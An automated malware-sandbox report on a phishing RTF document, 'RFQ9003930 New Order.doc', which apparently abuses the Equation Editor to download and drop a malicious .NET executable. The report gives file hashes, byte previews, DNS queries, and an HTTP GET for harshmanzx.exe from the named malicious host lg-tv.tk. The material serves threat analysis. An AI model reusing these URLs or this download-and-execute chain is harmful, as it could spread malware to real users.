                                                    Category:downloaded
                                                    Size (bytes):860672
                                                    Entropy (8bit):6.790198320706062
                                                    Encrypted:false
                                                    SSDEEP:12288:JIR5so4GVamo1M3de8zo70QuynMwr/amKEDm4fgGvSw24MLGhovWdo9S7LCn1tNP:3fqIFUF+W2L0YvUrzmOSha+u
                                                    MD5:DFF3BF025DCD487A2F0FB22B4CCF8998
                                                    SHA1:1FF59C9410FB281FFC8D2C3C1FC3268EACD5DBA1
                                                    SHA-256:230B56B1D072725EFF3A0E100515BA924377C9F0A79308BBFA3123269EE23D56
                                                    SHA-512:088C3395BE1BF0EF0DE2135D0588C6106C5A5F279B9B40761F58298DB8368A31107820DD621D66D2656B18417BF06E025A8CD3700075DAEAA393AB5A62B5E899
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Reputation:unknown
                                                    IE Cache URL:http://lg-tv.tk/harshmanzx.exe
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0................. ........@.. ....................................@.....................................O.......L....................`....................................................... ............... ..H............text....... ...................... ..`.rsrc...L...........................@..@.reloc.......`....... ..............@..B........................H............S........... ................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{18101DB0-D312-4B38-8216-5F3113E3A403}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):3.280909712408195
                                                    Encrypted:false
                                                    SSDEEP:96:3PAvyhDhQGujdn7dW0YZBXlUTCAj2IEQzfWXCS+uuA:3P/1hpuh8J/luv2I3fWeuZ
                                                    MD5:2B7B01C980CC57538ADE065F9A6086E7
                                                    SHA1:3915A3CEBC314FDAFEB350292F0168D7C98E12E1
                                                    SHA-256:B3DF296B6A6FBC980F20EEB841517B4170E9012D1F27C4CE3C9A0ABD7E275C15
                                                    SHA-512:DE47F11243C04000777D1C7C8D350301FA5280F3DF27F9F8E13226FCD9190114857F2A2AFDCB0045AB4D35FE49327E05803CEC2FA07D29AF1CDB37BF350E3419
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: #...4.,.-.<./.<.&.?...*.9.8.=.].?.?.1.?...,.?.`.?.0.%.=.;.3.<.7.7.^...8.4...?.?.&.#.2.;.@.[...:.#.%...8./.+.?.%.?...:.&._.|.1.;.?.3.).>.%.%...?.8.?.[.;.0...1.[.?.;.2.9.,.<.?.;.+.9.^.!.(.(...'.|.$.>.`.8.;.*.5.6.].2.-.'.?...3.8.'.].,.=.?.,.3.%.;.?.[.).@._.%.-.`.7.<...#.:.;.$.:.5.3.5.).;._.-.4.(./.4...*.$.>.`.=.+.7./.&.?.1.8.'.`.`.?.!.`.?.[...9.-.(.*.,.-.:.4.[.@.4.).>.5.?.%...(.4.?.;.>...(.?.2.1.`.!...~.-.'.7.`.?.8.+.+.?.:.1.(.?...~.[.?.~.3.+.&.?.,.@.^.;./.%./.:.'.*.;.2.|.?.@.<.#.%...?...7.?./.].!.:.+.[.?.~.].'.>.`.6.#...|.&.?.5.|.@.*.-.?.2.=.*.5.&._.,.=.../.>...5.)...8.*.?...?.?.).-.#...8.-.#.9.?...9.%.+.1...!.*.=.?.`.9.*...~...7.8.5.:.9.9.].?.?.$...~.1.4.:.(.0...#.*.1.@./.[.$.^.0.+.~.!...?.:.%.`.?.[.[.,.&.).6.6.?.:.;.<._.0.?.9.?.6.3.4.%.!.).^...).?.,.@....._.^.$.'.>.]._.?.&.?.~.<.+.(.?.8.,.+.!.8.(.8.<.(.2._.9.,.!.3.;.0.|./.(...7.9.].7.-.@.6.^._.^.'.`.,.0.[.|.#.`.3.^.[.$.+.[.<.8.8.^.~.8.2.4.%.,.(.=.-.*.~.[.9...|.].;.%.,.<...].0.?.'...&.]...?.3.~...~.~.`.?.?.8.&.|.~.?.2.8.6.*.).$.*.?.;.2.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78388EE1-378B-4475-870B-E925774DE169}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ9003930 New Order.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:59 2021, mtime=Mon Aug 30 20:08:59 2021, atime=Mon Sep 27 20:10:22 2021, length=10701, window=hide
                                                    Category:dropped
                                                    Size (bytes):2128
                                                    Entropy (8bit):4.52458334837527
                                                    Encrypted:false
                                                    SSDEEP:24:8+la/XTkZkXeiuDv3qGniE/7Es2+la/XTkZkXeiuDv3qGniE/7Eg:8aa/XTU4jGiWf2aa/XTU4jGiWB
                                                    MD5:6867F773174F0D2BC709AA81AF9410AA
                                                    SHA1:405B1EDD39E48DC6EEBC273E8DF5E89EFDD1CC47
                                                    SHA-256:C5B9209A70A6F7942EB29076EC5F30A16DF1FA7EA43295EC4BDC2BF92C0F6D60
                                                    SHA-512:F3BC77AB9E4660AC71088FD79199DA9514C94CEB0754AADE095F084F87F6BF5E3C1B3E32E9A2CF84E74FDF17DB403A18A48AEA0AEC5E8CAE16C66DEA27C83DE1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: L..................F.... ...xN.@...xN.@...x<......)...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S"...user.8......QK.X.S".*...&=....U...............A.l.b.u.s.....z.1......S#...Desktop.d......QK.X.S#.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..)..;SL. .RFQ900~1.DOC..^.......S ..S .*.........................R.F.Q.9.0.0.3.9.3.0. .N.e.w. .O.r.d.e.r...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\RFQ9003930 New Order.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q.9.0.0.3.9.3.0. .N.e.w. .O.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700..........D_..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):98
                                                    Entropy (8bit):4.352453630060135
                                                    Encrypted:false
                                                    SSDEEP:3:M1RDM1bFovxM1bFomX1RDM1bFov:MfDMJkxMJZDMJy
                                                    MD5:1D811A92C78A375B649E2FB614E7A04E
                                                    SHA1:1932F083F2669B24C0ADA7B8D10F23DB27A04F4A
                                                    SHA-256:1A231CC2FCD24278DC6427F44CD3DADDE7AFD8622F8662833B848389BC3566A7
                                                    SHA-512:443AE36E01B430DAC28650B912EE985CEC2E9BE0F6C757CD56B4D3336720980659B8F1235EDD34B083E913F59707BA7D6B48D9A1FF276FA93CA58FC49B72F6FD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: [doc]..RFQ9003930 New Order.LNK=0..RFQ9003930 New Order.LNK=0..[doc]..RFQ9003930 New Order.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.5038355507075254
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    C:\Users\user\AppData\Roaming\hasmenhtk721.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):860672
                                                    Entropy (8bit):6.790198320706062
                                                    Encrypted:false
                                                    SSDEEP:12288:JIR5so4GVamo1M3de8zo70QuynMwr/amKEDm4fgGvSw24MLGhovWdo9S7LCn1tNP:3fqIFUF+W2L0YvUrzmOSha+u
                                                    MD5:DFF3BF025DCD487A2F0FB22B4CCF8998
                                                    SHA1:1FF59C9410FB281FFC8D2C3C1FC3268EACD5DBA1
                                                    SHA-256:230B56B1D072725EFF3A0E100515BA924377C9F0A79308BBFA3123269EE23D56
                                                    SHA-512:088C3395BE1BF0EF0DE2135D0588C6106C5A5F279B9B40761F58298DB8368A31107820DD621D66D2656B18417BF06E025A8CD3700075DAEAA393AB5A62B5E899
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Reputation:unknown
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0................. ........@.. ....................................@.....................................O.......L....................`....................................................... ............... ..H............text....... ...................... ..`.rsrc...L...........................@..@.reloc.......`....... ..............@..B........................H............S........... ................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                    C:\Users\user\Desktop\~$Q9003930 New Order.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.5038355507075254
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                    Static File Info

                                                    General

                                                    File type:Rich Text Format data, unknown version
                                                    Entropy (8bit):3.9525834783925564
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:RFQ9003930 New Order.doc
                                                    File size:10701
                                                    MD5:514ab9ff13f08e764db59c3a79d95771
                                                    SHA1:33b2aee2f0e57a080eb6711591e4e38e9324621c
                                                    SHA256:286151dbc2feace2a895ff2b71cc0f7e46708aedc8ca16d6a86ba283c5dcdf21
                                                    SHA512:e1404a657695e1d64bb6bf535b020a5caa430817581a4c7df7412bb3117d3d40d03651eedc79b8278b449e5348ef9b99ccefef495f59a10f33864384294fa335
                                                    SSDEEP:192:c8YMwhKYggOb6AXDcev/WTgsJ/6yQrh+vh+CkE68lMOdCcU5:czMxcIWTgsJ/6trhHE68lMYI
                                                    File Content Preview:{\rtf9855#.4,-</<&?.*98=]??1?.,?`?0%=;3<77^.84.??&#2;@[.:#%.8/+?%?.:&_|1;?3)>%%.?8?[;0.1[?;29,<?;+9^!((.'|$>`8;*56]2-'?.38'],=?,3%;?[)@_%-`7<.#:;$:535);_-4(/4.*$>`=+7/&?18'``?!`?[.9-(*,-:4[@4)>5?%.(4?;>.(?21`!.~-'7`?8++?:1(?.~[?~3+&?,@^;/%/:'*;2|?@<#%.?.7

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static RTF Info

                                                    Objects

                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                    000000671hno
                                                    100000636h2embeddedeQuATION.31452no

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 27, 2021 14:10:55.493542910 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.522969961 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.523291111 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.523643017 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.552658081 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553503990 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553529024 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553548098 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553570986 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553596020 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553618908 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553641081 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553664923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553693056 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553714991 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.553730011 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.553761005 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.553766012 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.553769112 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.553771973 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.566122055 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.578049898 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578100920 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578121901 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578140020 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578157902 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578176022 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578202009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578223944 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578247070 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578269958 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578295946 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.578315020 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.578321934 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.578370094 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.578397989 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.579912901 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.579976082 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.579994917 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.579996109 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.580004930 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.580015898 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.580034971 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.580054045 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.580071926 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.580090046 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.580316067 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.580950975 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.603311062 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.603349924 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.603374004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.603399038 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.604908943 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.604943991 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.605437994 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.605452061 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.605456114 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.605983973 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606014013 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606036901 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606043100 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606055975 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606065035 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606077909 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606089115 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606098890 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606111050 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606127977 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606133938 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606151104 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606157064 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606170893 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606178999 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606199026 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606200933 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606219053 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606225014 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606237888 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606251001 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606265068 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606273890 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606283903 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606296062 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606312990 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606319904 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606333017 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606342077 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606360912 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606364012 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606379032 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606388092 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606398106 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606410027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606430054 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606436014 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606447935 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606460094 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606477022 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 27, 2021 14:10:55.606482029 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 27, 2021 14:10:55.606494904 CEST4916580192.168.2.22185.239.243.112

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 27, 2021 14:10:55.424110889 CEST5216753192.168.2.228.8.8.8
                                                    Sep 27, 2021 14:10:55.468858004 CEST53521678.8.8.8192.168.2.22
                                                    Sep 27, 2021 14:12:17.586719990 CEST5059153192.168.2.228.8.8.8
                                                    Sep 27, 2021 14:12:17.627370119 CEST53505918.8.8.8192.168.2.22
                                                    Sep 27, 2021 14:12:38.223071098 CEST5780553192.168.2.228.8.8.8
                                                    Sep 27, 2021 14:12:38.252263069 CEST53578058.8.8.8192.168.2.22
                                                    Sep 27, 2021 14:12:59.500027895 CEST5903053192.168.2.228.8.8.8
                                                    Sep 27, 2021 14:12:59.865873098 CEST53590308.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Sep 27, 2021 14:10:55.424110889 CEST192.168.2.228.8.8.80x9731Standard query (0)lg-tv.tkA (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.586719990 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.ceasa.clubA (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:38.223071098 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.alzayantourism.comA (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:59.500027895 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.eastwestasia-thailand.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Sep 27, 2021 14:10:55.468858004 CEST8.8.8.8192.168.2.220x9731No error (0)lg-tv.tk185.239.243.112A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.ceasa.clubparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:17.627370119 CEST8.8.8.8192.168.2.220xc18cNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:38.252263069 CEST8.8.8.8192.168.2.220x9c63No error (0)www.alzayantourism.comalzayantourism.comCNAME (Canonical name)IN (0x0001)
                                                    Sep 27, 2021 14:12:38.252263069 CEST8.8.8.8192.168.2.220x9c63No error (0)alzayantourism.com166.62.10.138A (IP address)IN (0x0001)
                                                    Sep 27, 2021 14:12:59.865873098 CEST8.8.8.8192.168.2.220x30e0Server failure (2)www.eastwestasia-thailand.comnonenoneA (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • lg-tv.tk
                                                    • www.ceasa.club
                                                    • www.alzayantourism.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 14:10:55.523643017 CEST0OUTGET /harshmanzx.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: lg-tv.tk
                                                    Connection: Keep-Alive
                                                    Sep 27, 2021 14:10:55.553503990 CEST2INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Mon, 27 Sep 2021 12:10:55 GMT
                                                    Content-Type: application/x-msdownload
                                                    Content-Length: 860672
                                                    Last-Modified: Mon, 27 Sep 2021 01:40:53 GMT
                                                    Connection: keep-alive
                                                    ETag: "61512125-d2200"
                                                    Accept-Ranges: bytes
